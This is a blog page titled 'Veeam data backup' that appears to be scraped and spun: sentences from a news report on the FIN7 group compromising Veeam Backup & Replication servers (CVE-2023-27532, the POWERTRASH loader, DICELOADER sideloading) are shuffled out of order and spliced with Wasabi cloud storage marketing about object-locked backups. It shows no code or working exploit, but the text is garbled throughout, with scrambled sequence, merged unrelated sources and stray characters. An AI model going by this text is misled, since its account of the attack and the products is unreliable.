AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |
Back to Blog
Veeam data backup1/14/2024 ![]() “A proof-of-concept (POC) exploit was made publicly available a few days prior to the campaign, on 23rd March 2023,” the WithSecure researchers said. The flaw allows an unauthenticated user who can connect to the server on TCP port 9401 to extract credentials stored in the server’s configuration database and potentially gain access to the server host system. While the WithSecure researchers are not sure how the servers were compromised, they suspect that the attackers exploited a vulnerability tracked as CVE-2023-27532 that was patched by Veeam on March 7. For example, they used SQL commands to steal information from the Veeam backup database and a custom script to retrieve passwords from the server. The attackers were also seen executing Veeam-specific commands. This library then decodes the DICELOADER payload from another file and executes it. The attackers deliver both the legitimate gup.exe along with its configuration file and a maliciously modified library called libcurl.dll that gup.exe is designed to execute. That PowerShell script was POWERTRASH, an obfuscated malware loader that’s been attributed to FIN7 in the past. However, FIN7 also expanded into ransomware, being associated with the Darkside and BlackMatter ransomware families, and more recently BlackCat/ALPHV.Ī forensic analysis on the compromised Veeam servers showed that the SQL Server process “sqlservr.exe” that’s related to the Veeam Backup instance was used to execute a batch shell script, which in turn downloaded and executed a PowerShell script directly in memory. ![]() The group was known in its early years for launching malware attacks against organizations from the retail, restaurant, and hospitality sectors with the goal of stealing credit card information. Tools and techniques used consistent with past FIN7 activityįIN7 or Carbon Spider is a cybercrime group that has been in operation since at least 2013 and has been associated with the Carbanak malware family. The post-exploitation activity included setting up persistence, system and network reconnaissance, credential extraction and lateral movement. Researchers from cybersecurity firm WithSecure investigated two such compromises so far, dating from late March, but they believe are likely part of a larger campaign. It’s not yet clear how attackers are breaking into the servers, but a possibility is that they’re taking advantage of a vulnerability patched in the popular enterprise data replication solution last month. Employ enterprise efficiency with all the benefits of Wasabi hot cloud storage - price, scalability, security, and durability.Researchers warn that a financially motivated cybercrime group known as FIN7 is compromising Veeam Backup & Replication servers and deploying malware on them. Backing up files directly to cloud object storage reduces the complexity of managing backups and minimizes spend on new storage hardware. Veeam Direct to cloud object storage (v12) allows Veeam users to backup their NAS systems directly to cloud object storage. While on-premises systems may be susceptible to cyber attacks and malicious encryption, object-locked backups in the Wasabi cloud provide an air-gapped immutable copy for guaranteed integrity when it comes time to recover that data. With Veeam Backup and Replication and Wasabi S3 Object Lock your backups cannot be deleted or altered (encrypted) without your permission. This dramatically simplifies off-site backup and simplifies compliance with the 3-2-1-1-0 Rule.īackups with Object Lock for Ransomware Mitigation Alternatively, you can set backups to be sent to local storage and the cloud simultaneously. This set-and-forget feature ensures that your on-premise systems maintain maximum available capacity, critical for high performance restore operations. ![]() Veeam Backup and Recovery can automatically schedule old on-premises backups to be moved to the cloud via copy job. With Veeam Backup and Replication v12 you can copy backups directly to the cloud, simplifying your backup jobs and making the move to the cloud even easier. ![]()
0 Comments
Read More
Leave a Reply. |